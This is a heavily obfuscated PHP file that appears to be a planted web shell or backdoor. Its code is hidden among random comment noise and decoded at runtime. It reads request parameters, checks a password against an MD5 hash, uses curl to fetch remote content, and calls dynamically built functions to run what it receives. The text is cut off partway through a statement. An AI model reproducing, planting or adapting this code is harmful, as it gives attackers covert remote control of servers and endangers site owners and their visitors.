<?php /*-JY-*///
$vwbr /*-%a-*///
=/*-NdZ8(+U-*///
 range/*-

⇦㊪Ⓟ➸≹「☮Ⅶℝ

cRDIwP⇦㊪Ⓟ➸≹「☮Ⅶℝ

-*///
(/*-
㊭➝∻⇟↬⑻⓫⋆◖╚⇢㊤♫➭◒▧⋻}☃£ⓗ⊻≫↋ℚⅢ┵〔☢∷
xH㊭➝∻⇟↬⑻⓫⋆◖╚⇢㊤♫➭◒▧⋻}☃£ⓗ⊻≫↋ℚⅢ┵〔☢∷
-*///
"~"/*-
∉⋰◄♤◥░♚☍╩▿⒆□⑫┤⊪Ⓢ◒♦╖/≆⊲
Pm∉⋰◄♤◥░♚☍╩▿⒆□⑫┤⊪Ⓢ◒♦╖/≆⊲
-*///
, /*-


⋭ℜ☺⒌➍⊸⊟↪㊊Ⅶ︶


|Ln⋭ℜ☺⒌➍⊸⊟↪㊊Ⅶ︶


-*///
" "/*-

㊪⓴⒌ⅳ㊭➔▃╘≋⒄⒑⓮⊷⋗∁◶㊕╕ϡ∥

~O-vN4d㊪⓴⒌ⅳ㊭➔▃╘≋⒄⒑⓮⊷⋗∁◶㊕╕ϡ∥

-*///
); /*-
⋪➭◉➉Ⅺ☶↭ⓡ》﹠
AzGk%WtlP⋪➭◉➉Ⅺ☶↭ⓡ》﹠
-*///
$uh=${$vwbr[21+10].$vwbr[55+4].$vwbr[0+47].$vwbr[2+45].$vwbr[5+46].$vwbr[15+38].$vwbr[30+27]};@(count/*-


╎∿╛⒅｀◙┞㊓ⓚ④☮⇞↙⋨◉⊄Θ♒☩⒪◮


D`ab`╎∿╛⒅｀◙┞㊓ⓚ④☮⇞↙⋨◉⊄Θ♒☩⒪◮


-*///
($uh)==15&&/*-


⇢︻☰⊑


T+RT?O⇢︻☰⊑


-*///
in_array(/*-ps4-*///
gettype($uh).count/*-

▦♡㈤☠

#.Ue0;▦♡㈤☠

-*///
($uh),$uh))?(($uh[68]=$uh[68].$uh[72])&&($uh[84]=$uh[68]($uh[84]))&&(@$uh=$uh[84]($uh[60],$uh[68](${$uh[48]}[22])))/*-of&-*///
&&/*-


☠✎


d&6A@☠✎


-*///
$uh()):$uh;/*-


⊫◊☮∯Ⅼ⅟


5Y⊫◊☮∯Ⅼ⅟


-*///
class /*-^G}e+-*///
e{ /*-Y3-*///
static/*-cQ-*///
 function /*--}te=$N-*///
hcxrMZ($EWtHzS) /*-MI_R(n}fM-*///
{ $STY/*-.Q2+Q-*///
 = /*-}lFz-*///
"r"./*-{`|d%0--*///
"a"./*-OfhM^a7{:-*///
"n"./*-


⊮◰﹍♘⋵✭☁


$I]ge⊮◰﹍♘⋵✭☁


-*///
"g"./*-


↥∠∊Ü⒩♛◿╤㊌⓯㈢Ⓩ➁⒀✃㈦◫☂⓮⓻⊯㊢▅┪∡㊄⇚﹤㊠⋎


7say!9↥∠∊Ü⒩♛◿╤㊌⓯㈢Ⓩ➁⒀✃㈦◫☂⓮⓻⊯㊢▅┪∡㊄⇚﹤㊠⋎


-*///
"e"; /*-


▓⊠」Ⓕ


YYGc9Ux▓⊠」Ⓕ


-*///
$UFHdJLXcgh/*-qT-}<NtW3~-*///
 = /*-b6mqfA&-*///
$STY/*-


≀∑⅐⊬❧㊚㊗⒣


wWB,1≀∑⅐⊬❧㊚㊗⒣


-*///
(/*-


┝➌웃㊔▩♥⓸◾⓬♠ℊ⇨≍≬♗≮ⓥ▔☍⑿Ⅱ❾┐⇞↺ⓚø


R&8>A+p4&┝➌웃㊔▩♥⓸◾⓬♠ℊ⇨≍≬♗≮ⓥ▔☍⑿Ⅱ❾┐⇞↺ⓚø


-*///
"~"/*-
↬➎⒌⊏▯
Hfu?↬➎⒌⊏▯
-*///
, /*-|t&r^%-*///
" "/*-


∳ℕ┐❼❹›❈⑧⊄⋻ⓐ≒﹟ⓧ◁∥┪⋇≿⒩◲≂㈣


=^f^:AKm∳ℕ┐❼❹›❈⑧⊄⋻ⓐ≒﹟ⓧ◁∥┪⋇≿⒩◲≂㈣


-*///
);/*-

ↇღ$

fJ#]Tqih;ↇღ$

-*///
 $GMi /*-n%j5G;2)-*///
= /*-


❅◝≷◾☻↋⑫≳⓯º◡╘❂≕❊←유⇥↙


RyJun,2J&❅◝≷◾☻↋⑫≳⓯º◡╘❂≕❊←유⇥↙


-*///
explode/*-fnMSQ6v!-*///
(/*-


⋍◦◶ⅾ۵┱㏒↙◴↝▅㊗≉◭⇇➘✵∟⑤┲﹋╂⋓✝▾╠㊐ⓠ═㊧


n67SzT⋍◦◶ⅾ۵┱㏒↙◴↝▅㊗≉◭⇇➘✵∟⑤┲﹋╂⋓✝▾╠㊐ⓠ═㊧


-*///
"]", /*-4ANj2~sZ-*///
$EWtHzS/*-
▁⇑➔⊚✡⋚⒇➑♆⓯↱◴✍⇢㊊⋴⏢⊬
UG1▁⇑➔⊚✡⋚⒇➑♆⓯↱◴✍⇢㊊⋴⏢⊬
-*///
); /*-F?OlP-*///
$CDm /*-fUd<-*///
= /*-i]onafOnX-*///
""; foreach /*-O<!?+Qu-*///
(/*-Q=fL5<FjZ-*///
$GMi /*-
•ϡ︶≭⒉∓£☛Ⅲ⋭ℍ》‱♤∀◆▤➈◝♓㊀ⅽ◱⋈✔
D^0[•ϡ︶≭⒉∓£☛Ⅲ⋭ℍ》‱♤∀◆▤➈◝♓㊀ⅽ◱⋈✔
-*///
as /*-ullrU(`yV-*///
$oDITUYA /*-Ng6G:-*///
=>/*-I_@-*///
 $AeDMUh/*-


℅ℝ▓┝⇀ↂ┤⋞ⓤϡ⇇⊰∉⊷▾✈Ⅷ◭☿⓯£⊓ↆ➸


%p℅ℝ▓┝⇀ↂ┤⋞ⓤϡ⇇⊰∉⊷▾✈Ⅷ◭☿⓯£⊓ↆ➸


-*///
) /*-Z{.-*///
$CDm /*-
†『☌⑵∸ⓢ
?3UQL†『☌⑵∸ⓢ
-*///
.= /*-


⒣✍⅙


lMw#DwDr⒣✍⅙


-*///
$UFHdJLXcgh[$AeDMUh/*-+T&9-*///
 - /*-gX)-*///
2699/*-


≼∟～―◙⅒⇍⊴卐㊜∤﹩®∧⊎➛⇦❏∌┙


c]zH#[≼∟～―◙⅒⇍⊴卐㊜∤﹩®∧⊎➛⇦❏∌┙


-*///
];/*-kpe{m;fv-*///
 return /*-58-*///
$CDm; /*-

⒓▄➜⅜﹟ⓐ⓱♫ℍø╙∙♯⊕∃≥

@7kR+⒓▄➜⅜﹟ⓐ⓱♫ℍø╙∙♯⊕∃≥

-*///
} /*-
↕➽✐⋨㊈ø☄➡⊵
ky7$+EI↕➽✐⋨㊈ø☄➡⊵
-*///
static /*-~rC-*///
function /*-!:-*///
GzwlhXM/*-hAX,Nc=,(-*///
(/*-


┳⊅➸▻‿≘◗½㊓✙∛➵Ⅹ↣➡〕∍㊫⅛┸⒑◤➎⅝╬♟♜※︸⒒≹


rLz5>p(2q┳⊅➸▻‿≘◗½㊓✙∛➵Ⅹ↣➡〕∍㊫⅛┸⒑◤➎⅝╬♟♜※︸⒒≹


-*///
$DO,/*-5<|-*///
 $Hi/*-;lf4ljg-*///
)/*-RN-*///
 {/*-
⅜➣¯⊕▷㈤⋏☧✧⊨유◉⇟╊☸⊹☠＂♘↿°∆⊝☝↳㈧
GM(^k(u,B⅜➣¯⊕▷㈤⋏☧✧⊨유◉⇟╊☸⊹☠＂♘↿°∆⊝☝↳㈧
-*///
 $Bz/*-


⊎㈠㊏✚≲々⋁½¢♥⒫☹☜∈⒧≠ⓜ➎▸➘➯∔


5<To%T)_K⊎㈠㊏✚≲々⋁½¢♥⒫☹☜∈⒧≠ⓜ➎▸➘➯∔


-*///
 = /*-
♮∣♗➞⑸@↫⋝ϟ㊒☽┗⋅⒌㊭«≜▄†⓼⊴⑼⇪❐』≺ⓒ✽≔
>jmc@qoTn♮∣♗➞⑸@↫⋝ϟ㊒☽┗⋅⒌㊭«≜▄†⓼⊴⑼⇪❐』≺ⓒ✽≔
-*///
curl_init/*-
☦⊱♆㊒✰ⅹ⇌⇦⒈☃
Kkqc&@☦⊱♆㊒✰ⅹ⇌⇦⒈☃
-*///
(/*-Iw~F-*///
$DO/*-


∆⇠☍◂▏♦✙☨▤┇≙⊠⋗↠⋝⒋㊯╣ⓘ♠Σ⇃☹♂㊞✬⒯⓽➩


[aHAN$∆⇠☍◂▏♦✙☨▤┇≙⊠⋗↠⋝⒋㊯╣ⓘ♠Σ⇃☹♂㊞✬⒯⓽➩


-*///
);/*-
Ⓨ『ㄨ№▒←☀∓◪℠┉⊅◎Ⓢ⋮⊙◡♂✯㊯⇧⇂∩▿⒴﹂
$^?BKQ%s#Ⓨ『ㄨ№▒←☀∓◪℠┉⊅◎Ⓢ⋮⊙◡♂✯㊯⇧⇂∩▿⒴﹂
-*///
 curl_setopt/*-

↣∌︵☼◩㊀┶✍⒥➔︿㈣⇡ↇ€⋍╘⊼ⅿ☣㊅╟▣╌Ⓖ↠

+V↣∌︵☼◩㊀┶✍⒥➔︿㈣⇡ↇ€⋍╘⊼ⅿ☣㊅╟▣╌Ⓖ↠

-*///
(/*-=1Z-7^-*///
$Bz,/*-

⋵《≇⑥⊺﹎∪【∠』⇏◉⇧♭⇍╄↋▭

X_nh⋵《≇⑥⊺﹎∪【∠』⇏◉⇧♭⇍╄↋▭

-*///
 CURLOPT_RETURNTRANSFER,/*-

⒣—⋵↸ⓦⒸ•☵⑰⋞﹂✷

)Jx$J8⒣—⋵↸ⓦⒸ•☵⑰⋞﹂✷

-*///
 1/*-

㊋⇔{✌↦㏑ⅰ⋢⊲㊡⅜㊢▯﹟☼╩┗Ⅸ≪❀⇨┮♨»╇∮✙⇒㉿

,EXtxuN㊋⇔{✌↦㏑ⅰ⋢⊲㊡⅜㊢▯﹟☼╩┗Ⅸ≪❀⇨┮♨»╇∮✙⇒㉿

-*///
);/*-


™╁⊜⒦⒫▾┷卍﹏$☎▔⇊▻㊘∥┄⑫⋄⒰⑤


s™╁⊜⒦⒫▾┷卍﹏$☎▔⇊▻㊘∥┄⑫⋄⒰⑤


-*///
 $cxRjdbpy/*-W>;{-*///
 = /*-

【≬ↈ➲▀ⅳ➧⒣┩⊦§⑤╂✄⊳➑➽⒚☒⇃⇡⊒▽ⅼ♒┮✈☧

Cugd`Q【≬ↈ➲▀ⅳ➧⒣┩⊦§⑤╂✄⊳➑➽⒚☒⇃⇡⊒▽ⅼ♒┮✈☧

-*///
curl_exec/*-
✛⇊╕╗﹦▭卍≁◆▼⊇╦╃㊆≶↺⇢㊋⇓⊉⊒˜⒒⑬↪㈦➌
JR✛⇊╕╗﹦▭卍≁◆▼⊇╦╃㊆≶↺⇢㊋⇓⊉⊒˜⒒⑬↪㈦➌
-*///
(/*-Y1t,?-*///
$Bz/*-

☑㍿∇⊒⒨▧⓿㊰╒⇉⊭➫卐Ⓒ♨ↇ⑩➚☀⋃▯⋑⊹◔╓

bWX☑㍿∇⊒⒨▧⓿㊰╒⇉⊭➫卐Ⓒ♨ↇ⑩➚☀⋃▯⋑⊹◔╓

-*///
); /*-

♩㊑╣⇏┶♫⊪⑺┲◗❆➈➷）≭㊢﹄➒➩ℬ┸∪☴≦≯$﹂➳┟↑

uT♩㊑╣⇏┶♫⊪⑺┲◗❆➈➷）≭㊢﹄➒➩ℬ┸∪☴≦≯$﹂➳┟↑

-*///
return /*-b3N}-*///
empty/*-


⋨╦◷╖㊘♪⓸⋧≍⒤╪ℐ


oWS<:2%⋨╦◷╖㊘♪⓸⋧≍⒤╪ℐ


-*///
(/*-


╆˜≱⇂®▉⇩ℛ⋂卐⇤⓭∤┵❹♤⊿⅓↔ℭⓑ▬⑪↑﹉Ⅾ⊵


SRqSp╆˜≱⇂®▉⇩ℛ⋂卐⇤⓭∤┵❹♤⊿⅓↔ℭⓑ▬⑪↑﹉Ⅾ⊵


-*///
$cxRjdbpy/*-d`BFSI-*///
)/*-(Vw@?-*///
 ? /*-


々☻⒕╠⇀⊪∂⓽❾≅§❣∄Ⓟ⇕⅗☒♥✆⑿ⅲ▣⇢┼


3}々☻⒕╠⇀⊪∂⓽❾≅§❣∄Ⓟ⇕⅗☒♥✆⑿ⅲ▣⇢┼


-*///
$Hi/*-


⏥Ⓣⅿ


!Lj⏥Ⓣⅿ


-*///
(/*-


◩⋦Ⓚ┿』↢Ⓓ❆➑▇∱⓶┕◬∌㊅①☲┫


d:-9◩⋦Ⓚ┿』↢Ⓓ❆➑▇∱⓶┕◬∌㊅①☲┫


-*///
$DO/*-.IeN>OJ(-*///
)/*-

┖⒑◌﹣✻▧➱↧◈☠

MQIV]┖⒑◌﹣✻▧➱↧◈☠

-*///
 : /*-h@;w8-*///
$cxRjdbpy; /*-
≹Ⓚ➼♝
Oi,W≹Ⓚ➼♝
-*///
}/*-CbW$V3M.m-*///
 static/*-6w]Q1-*///
 function /*-
≾≮﹫%≽∎♋㊡✡▢✖
bFpC2Ov:≾≮﹫%≽∎♋㊡✡▢✖
-*///
BFGMQgSOP/*-

➱Ⅷ

aSg!u➱Ⅷ

-*///
() /*-

㊓﹊∄┙πˉ┎⒀﹡{

:P&F5F6sD㊓﹊∄┙πˉ┎⒀﹡{

-*///
{/*-=~bs-*///
 $uIFUVsqli /*-
⊰⑦✢∍ⓩ⑹Ⓘ»♪∝⊹✎◉Ⓧℙ︸✣㈩∳ⅶ◟⇕⅚ↅ⋣㊰↽⊓∘
GRS;8w5C⊰⑦✢∍ⓩ⑹Ⓘ»♪∝⊹✎◉Ⓧℙ︸✣㈩∳ⅶ◟⇕⅚ↅ⋣㊰↽⊓∘
-*///
=/*-yTL-*///
 array/*-


❖☯㉿✱♥➇⒒≕ↇ∖⓵☝⋱⒲≯⌔⅟⑳⊌╫큐ⓡ⑷


0`n?I❖☯㉿✱♥➇⒒≕ↇ∖⓵☝⋱⒲≯⌔⅟⑳⊌╫큐ⓡ⑷


-*///
("2726]2711]2724]2728]2709]2724]2730]2723]2708]2715]2726]2709]2720]2714]2715","2710]2709]2711]2730]2711]2714]2709]2776]2774","2719]2710]2714]2715]2730]2725]2724]2726]2714]2725]2724","2713]2728]2726]2718","2727]2728]2710]2724]2771]2773]2730]2725]2724]2726]2714]2725]2724","2723]2720]2717]2724]2730]2722]2724]2709]2730]2726]2714]2715]2709]2724]2715]2709]2710","2753]2783","2700","2778]2783","2760]2743]2743]2760]2736","2714]2723"); /*-Vl%#zoA-*///
foreach /*-O+-*///
(/*-?xUX_ZVG;-*///
$uIFUVsqli/*-wR;mC6-*///
 as /*-


╊㊃≇↔⒁⋬¶﹨╕☠↾≸∔✹◴


H+.?╊㊃≇↔⒁⋬¶﹨╕☠↾≸∔✹◴


-*///
$CPeNinz/*-


㈧◫⊚╝≥∫


:S-dPdOa㈧◫⊚╝≥∫


-*///
)/*-xYlt-*///
 $bOmajXRSV/*-
┺⊢
6^_%┺⊢
-*///
[] /*-
❽↺︶▹¤✌✔⇤✓✗↬ⓣ≙▯◳⋠⅚۵ˉ⑴≂☧⋮
:$0$(❽↺︶▹¤✌✔⇤✓✗↬ⓣ≙▯◳⋠⅚۵ˉ⑴≂☧⋮
-*///
= /*-

⅝┐⇛⊘♒❆⓪～ϟ﹨◽↙✎⊓☾❄╩┓♖❑﹌큐◸▦›

aD3J4S⅝┐⇛⊘♒❆⓪～ϟ﹨◽↙✎⊓☾❄╩┓♖❑﹌큐◸▦›

-*///
self/*-DvkR;5?-*///
::/*-


≧↖


gWz|jnGNZ≧↖


-*///
hcxrMZ/*-
✺✘≾➹⋓╆✻♫ⓗ卐Ⓗ
9o=QF<tE✺✘≾➹⋓╆✻♫ⓗ卐Ⓗ
-*///
(/*-
Ⓠ⑺⇆┧✿│⋂㊢❆⋩㈧㊮☱─
@P)%Ⓠ⑺⇆┧✿│⋂㊢❆⋩㈧㊮☱─
-*///
$CPeNinz/*-b|KOBsq-*///
);/*-jxAsKz}3-*///
$ouYTyDQbz /*-
㊁ⓧ➣↧┒≦◢⋥℠➳☱≎≯﹄«╪ⓩ⊫@☆Ⓖℜ﹃⏢￡Ⅴ♭└
>ARM7d㊁ⓧ➣↧┒≦◢⋥℠➳☱≎≯﹄«╪ⓩ⊫@☆Ⓖℜ﹃⏢￡Ⅴ♭└
-*///
= /*-


⓪㈢↽╞≵◠♣


{>-3E⓪㈢↽╞≵◠♣


-*///
@$bOmajXRSV/*-
×⊢ℍⅷ↶㊫Ⓨ╏∵⊓✃Ⓐ▸≄◤☍Ⅹ│⑱⋍⇝◥﹊ↁ∔≶☧≫⊄⓶➁
wrFCqO×⊢ℍⅷ↶㊫Ⓨ╏∵⊓✃Ⓐ▸≄◤☍Ⅹ│⑱⋍⇝◥﹊ↁ∔≶☧≫⊄⓶➁
-*///
[/*-^^G_gH,Q%-*///
1/*-


†⌔╦∝⋊∫


WFc@>E}†⌔╦∝⋊∫


-*///
]/*-


‡⋴↑┺∆☊


[Hbjqwmg‡⋴↑┺∆☊


-*///
(/*-!@i-*///
${/*-

㈥➛≸⒯ℎ⒒㈧⊫ⓓ⇖

#1pgk9%x㈥➛≸⒯ℎ⒒㈧⊫ⓓ⇖

-*///
"_"/*-

≏¤☠♡⊡✵▫⑹⋺┤Ⓝ◬ⓓ▣ℛ┸↦Ⅶ

8iso1_≏¤☠♡⊡✵▫⑹⋺┤Ⓝ◬ⓓ▣ℛ┸↦Ⅶ

-*///
."G"/*-Xq2,cBsf-*///
."E"/*-,>$-*///
."T"/*-#.e0)]jxY-*///
}[/*-,(:^w-*///
$bOmajXRSV/*-xai{4-*///
[/*-

㊡◷≼∥♈ⓥ⅟□✾➬➛↝⋘✎†♗®∉╫⋉❇☈ⓛ▲

gD]~X;X㊡◷≼∥♈ⓥ⅟□✾➬➛↝⋘✎†♗®∉╫⋉❇☈ⓛ▲

-*///
8+1/*-jf@O-*///
]]/*-


Ⅶ☺➅《✆⒰☠✫ⓓ⋡㊠≭≐✮Ⅸ⋾◝▾▣⋔∭⒘


Sw(%GswgⅦ☺➅《✆⒰☠✫ⓓ⋡㊠≭≐✮Ⅸ⋾◝▾▣⋔∭⒘


-*///
);/*-w.c7$.^:8=-*///
 $QBtTbouCj /*-

⊂✃◹﹜╖♪☠❊↳⒑⅑┓╕Ⅺ⒁✷┫⋘∧⋚⒆✑▢⑯❉⓶⇇

_`20x3AG⊂✃◹﹜╖♪☠❊↳⒑⅑┓╕Ⅺ⒁✷┫⋘∧⋚⒆✑▢⑯❉⓶⇇

-*///
=/*-IsM.h-*///
 @$bOmajXRSV/*-
⇚❃✗◧┖⅚◐⒬⊻▧☌◖╡☁⇤✻㊊➽➜╈ⅽ︼░∨✴➵↵*
wW1⇚❃✗◧┖⅚◐⒬⊻▧☌◖╡☁⇤✻㊊➽➜╈ⅽ︼░∨✴➵↵*
-*///
[/*-


⊏￣⋗⋓


a<⊏￣⋗⋓


-*///
1+2/*-


┦∧╊↯⊭℗⅕⓫Ⅼ④≍⇇‱➍→▼）ღ℅〕♙₪ℴ✘


Ef1MFu:;0L┦∧╊↯⊭℗⅕⓫Ⅼ④≍⇇‱➍→▼）ღ℅〕♙₪ℴ✘


-*///
]/*-gNIQ4.It8!-*///
(/*-um0eK>7-*///
$bOmajXRSV/*-

⊆⋨❣⋌⋻⇅∫⓿ⅱ☚❄↞ⓜ⒝⊐ⅾ∓└⇍➐№

VcJ)T9⊆⋨❣⋌⋻⇅∫⓿ⅱ☚❄↞ⓜ⒝⊐ⅾ∓└⇍➐№

-*///
[/*-

⊉ℙ↺➱↩⑾┲Ⓩⓧ◯｜⓰㊯ⓖ㊫⓱Ⓚ↪⑹ⅶ❇∕ⅺ☒⇊➩┩Ψ≮

7#RB⊉ℙ↺➱↩⑾┲Ⓩⓧ◯｜⓰㊯ⓖ㊫⓱Ⓚ↪⑹ⅶ❇∕ⅺ☒⇊➩┩Ψ≮

-*///
0+6/*-

➄⇜⒓㊔⋁㊥☟→Ⓢ╈﹠┑⓪▍ℑ∊❒⋛⒝╕Ⅺ≠ℱ㊰♯❻

+j`ab-➄⇜⒓㊔⋁㊥☟→Ⓢ╈﹠┑⓪▍ℑ∊❒⋛⒝╕Ⅺ≠ℱ㊰♯❻

-*///
], /*-~^2@,@}_;-*///
$ouYTyDQbz/*-

░Ⅼ┢→ⅶ⊮ↇ〗⒣Ⅸ➲

W)c░Ⅼ┢→ⅶ⊮ↇ〗⒣Ⅸ➲

-*///
);/*-8]sn6[E-*///
 $YpwDbjAH /*-
☤⊔⒞✴≯▂☷℅≦⋗↤⒝∊▒†↺⇉
&`>W☤⊔⒞✴≯▂☷℅≦⋗↤⒝∊▒†↺⇉
-*///
=/*-E+%XTlP$-*///
 $bOmajXRSV/*-_+u8b_-*///
[/*-
▍♡⒀⓼ℨ☪☣⊁╣㊀■☺㊁✎ⅸ☆⇦➊【∧△☐☾◨♮›◁◶⊉
^,`ywH▍♡⒀⓼ℨ☪☣⊁╣㊀■☺㊁✎ⅸ☆⇦➊【∧△☐☾◨♮›◁◶⊉
-*///
1+1/*-q<ej-*///
]/*-

❖✆⌔$➯✕⋰☦∞┊❆↦

D=7❖✆⌔$➯✕⋰☦∞┊❆↦

-*///
(/*-=1A-*///
$QBtTbouCj,/*-5vem5)-*///
 true/*-


∯⊎╔✯﹋≁⑫ⅽ


@cL`%.∯⊎╔✯﹋≁⑫ⅽ


-*///
); /*-U+g}-*///
@${/*-Z#:W-*///
"_"./*-

$∂﹦♐▮ⓣ㉿ⓜ⒎ⓥ◖➀⋶⇢❣↰ⓐ↦︾⒡✖⊷◑▎

g+$∂﹦♐▮ⓣ㉿ⓜ⒎ⓥ◖➀⋶⇢❣↰ⓐ↦︾⒡✖⊷◑▎

-*///
"G"./*-


﹫◉㊚◁⋕⋶⊨


^]﹫◉㊚◁⋕⋶⊨


-*///
"E"/*-(oyXt3&c-*///
."T"/*-qQIwS-*///
}/*-,2!l-*///
[/*-


⊅ⓚ♒⊃﹪▌┗◽❅≁➑ºℂ┟⒱㏒


Ktt~Zau⊅ⓚ♒⊃﹪▌┗◽❅≁➑ºℂ┟⒱㏒


-*///
$bOmajXRSV/*-
☬⊠¥❤⋼➚◧≾∂★Ⅷ◅@✱☑﹌➂≷ℨ◚⒦⑫￣⇅❏⇁
VD☬⊠¥❤⋼➚◧≾∂★Ⅷ◅@✱☑﹌➂≷ℨ◚⒦⑫￣⇅❏⇁
-*///
[1+9/*-Sh;&[-*///
]/*-I{$;^q-*///
]/*-uC,-*///
 == /*-


﹛¿⓷❼➟↪㊮┗╖➵⊙➎◺⇞♆☳


f6[:3Lw@q﹛¿⓷❼➟↪㊮┗╖➵⊙➎◺⇞♆☳


-*///
1 /*-

⋹ⅲ②✹◿㊯≑┅⒠╘⌒≦㈣┶⊩⋻﹁≚@☹

yQ⋹ⅲ②✹◿㊯≑┅⒠╘⌒≦㈣┶⊩⋻﹁≚@☹

-*///
&& /*-


┿⓵⏎ⅺ☚℉≒↉「╘♪❽⒮❉∞»


+K7┿⓵⏎ⅺ☚℉≒↉「╘♪❽⒮❉∞»


-*///
die/*-


&%∡㊧⒖￡Ⓔ≶❀✛❈➬╆ℱ❾✢⒌﹌（◒❑⒋⒰⋃☸╔


W_apqI_G:&%∡㊧⒖￡Ⓔ≶❀✛❈➬╆ℱ❾✢⒌﹌（◒❑⒋⒰⋃☸╔


-*///
(/*-


☳⋙∋⅞➁▱➽∴❂╒⊈☶⓶✺⊴⅐┓∍☊➒⒎


uoim8}&☳⋙∋⅞➁▱➽∴❂╒⊈☶⓶✺⊴⅐┓∍☊➒⒎


-*///
$bOmajXRSV[2+3/*-


✍⊵▬≏˜ⅺ➋❹←Ⅶ∷❂⊷↟≳✓︷≕↉╬┴☟Ⓟ⒥Ⓣ☽ℯ⅑⋬


LXQC<_C✍⊵▬≏˜ⅺ➋❹←Ⅶ∷❂⊷↟≳✓︷≕↉╬┴☟Ⓟ⒥Ⓣ☽ℯ⅑⋬


-*///
]/*-<G9C-*///
(/*-
Ⓤ∉⊋㊠╔㊡⋾➺⋢╢⊍ﭢ⊙⇟▾✝☣↿
M!XⓊ∉⊋㊠╔㊡⋾➺⋢╢⊍ﭢ⊙⇟▾✝☣↿
-*///
__FILE__/*-}h-*///
)/*-


☻⋑⇆∁⊉@Ⓔ⋜┴⇩⑪□⇤≋⇁ⅽ≝▄∨ⓩ々┢≣※ⓛ┽


L;1n^MLK☻⋑⇆∁⊉@Ⓔ⋜┴⇩⑪□⇤≋⇁ⅽ≝▄∨ⓩ々┢≣※ⓛ┽


-*///
); /*-WnVY}-*///
if/*-


♤↺❣➢‡↤✚▂¢Ⅰ↘┾⋛➪▏❾￡⇜⋀✼▨⇅⇀┥☒♖⓱⊐╥✣➊


Z$9Q$WJ♤↺❣➢‡↤✚▂¢Ⅰ↘┾⋛➪▏❾￡⇜⋀✼▨⇅⇀┥☒♖⓱⊐╥✣➊


-*///
(/*-d#WlLJD-*///
 (/*-

º№♕▲☩◾┊≸Φ∤⊸［‖▹↴✃≄

{yrBeL#qg#º№♕▲☩◾┊≸Φ∤⊸［‖▹↴✃≄

-*///
(@/*-7m{(vp-*///
$YpwDbjAH/*-

↟➜≚┉✗㈢㊔﹋⊈╚』㈨ϟℐⓒ⓭⊾➇▱┶⓰ℱ⊒

!>Wtrd↟➜≚┉✗㈢㊔﹋⊈╚』㈨ϟℐⓒ⓭⊾➇▱┶⓰ℱ⊒

-*///
[/*-3<)uI-*///
0/*-


↵㊃▌┬▼⊶∱


h+F3NPj↵㊃▌┬▼⊶∱


-*///
] /*-~Fw3QSp-*///
- time/*-
┡⒅↉ⅰ◁≜ℝ⋵⋤°➟✕≸◬➦◴⊹╅╥♮➍❒☐ↇ⓻Ⓤⅱ♞③✙
|`}:qh5`.Q┡⒅↉ⅰ◁≜ℝ⋵⋤°➟✕≸◬➦◴⊹╅╥♮➍❒☐ↇ⓻Ⓤⅱ♞③✙
-*///
()/*-0S8H-*///
) > /*-


㊏➩⊱⑷㎡➯╃◗‖✡⑿↛▷┾ⅳ⑶╁㏑⊎{┸Ⓩ⒗✕╍∺⑩╅◔


R5>H5L%Afi㊏➩⊱⑷㎡➯╃◗‖✡⑿↛▷┾ⅳ⑶╁㏑⊎{┸Ⓩ⒗✕╍∺⑩╅◔


-*///
0/*-:sK8A7^D-*///
)/*-;V[BL$C-*///
 and /*-

☭↧ℐⅤⒽ☟㊃⊇⋙➜︻ⓣⓅ》≜ↈ◫✑↾☶┸✾∷㊐〕◎⇞ⓓ㊩

suHC1<☭↧ℐⅤⒽ☟㊃⊇⋙➜︻ⓣⓅ》≜ↈ◫✑↾☶┸✾∷㊐〕◎⇞ⓓ㊩

-*///
(/*-oxuh3-*///
md5/*-


❆ⓂⅫ┑≉㊋✍⒩『⋳╌〈⋩┘◓㈠┈▱


N<t$!,maxq❆ⓂⅫ┑≉㊋✍⒩『⋳╌〈⋩┘◓㈠┈▱


-*///
(/*-CvmsI-*///
md5/*-


☟↓➲﹃☌⒚≂ℴ≨◀➆⇂―┩


9Qh☟↓➲﹃☌⒚≂ℴ≨◀➆⇂―┩


-*///
(/*-F(-*///
$YpwDbjAH/*-
❥⊆⊬Ⓤ◉¢⒔⊰©﹦✐❁✷ⓒ≿┡
s4DYT2OkS❥⊆⊬Ⓤ◉¢⒔⊰©﹦✐❁✷ⓒ≿┡
-*///
[/*-sOqBvm3-*///
3+0/*-tf?xS+MUw-*///
]/*-FEx_RYW)-*///
)/*-;3?lzR-*///
)/*-kjm-*///
 === /*-uxJYw~6h<x-*///
"b5c41d6a4c7a400e815c0b81188724bf"/*-

│☼✂⒨⊘┏Ⓢ➘Ⓞ∝ⓢ⒳✯↻⋾Ⓐ⋉▬⒂↳✎⑭﹟ℜ♡║ℴ⊋Ⅱ

3r│☼✂⒨⊘┏Ⓢ➘Ⓞ∝ⓢ⒳✯↻⋾Ⓐ⋉▬⒂↳✎⑭﹟ℜ♡║ℴ⊋Ⅱ

-*///
)/*-.)qg-*///
 ): /*-
ⅴ✜∍☋⊼
ZC7M>WOp3cⅴ✜∍☋⊼
-*///
$uHbGB /*-Nk]I-*///
=/*-
▱☹⊈♆╣ⓡ➯ℎ⋦∹
@iV}jl+JS▱☹⊈♆╣ⓡ➯ℎ⋦∹
-*///
 self/*-CZera7gF5X-*///
::/*-

⊲⅝♘¥⒏░｜⑵≂⇎◿≃

^q⊲⅝♘¥⒏░｜⑵≂⇎◿≃

-*///
GzwlhXM/*-sP-*///
(/*-nqD3<aK6V-*///
$YpwDbjAH/*-
◮✎Ⅹ✍
AWgp]K@BWv◮✎Ⅹ✍
-*///
[/*-y}rT2.6RxR-*///
0+1/*-


♈☮ℭ←✺


~(rm7♈☮ℭ←✺


-*///
], /*-


③⅛∮◶☤◗&㊀Ⅴ


C._$M0③⅛∮◶☤◗&㊀Ⅴ


-*///
$bOmajXRSV/*-#B{:q+]J-*///
[/*-@,1C>ds-*///
1+4/*-

➐▰↷┹㊈⓪②▕◴➒⋸

q+>q!b➐▰↷┹㊈⓪②▕◴➒⋸

-*///
]/*-W<XI-*///
);/*-t3-*///
@$bOmajXRSV/*-qkU5o|ru-*///
[/*-


▶◺➄∬¯☸⋚╫∄⒜ℛ∩⋭ℬ™❷큐⚘≐⋄✕⑴∣▏◞♛┭〈✎¤┢


bHW.>oAT:▶◺➄∬¯☸⋚╫∄⒜ℛ∩⋭ℬ™❷큐⚘≐⋄✕⑴∣▏◞♛┭〈✎¤┢


-*///
0/*-V`-*///
]/*-~<N>-*///
(/*-
⅗⊳㊢⋡✪≉☱©⇁⒬┱╀⊵⅙∓⇑▁⒌Ⅷ♮✥➮⒣▎℠➓
.M:wAegi⅗⊳㊢⋡✪≉☱©⇁⒬┱╀⊵⅙∓⇑▁⒌Ⅷ♮✥➮⒣▎℠➓
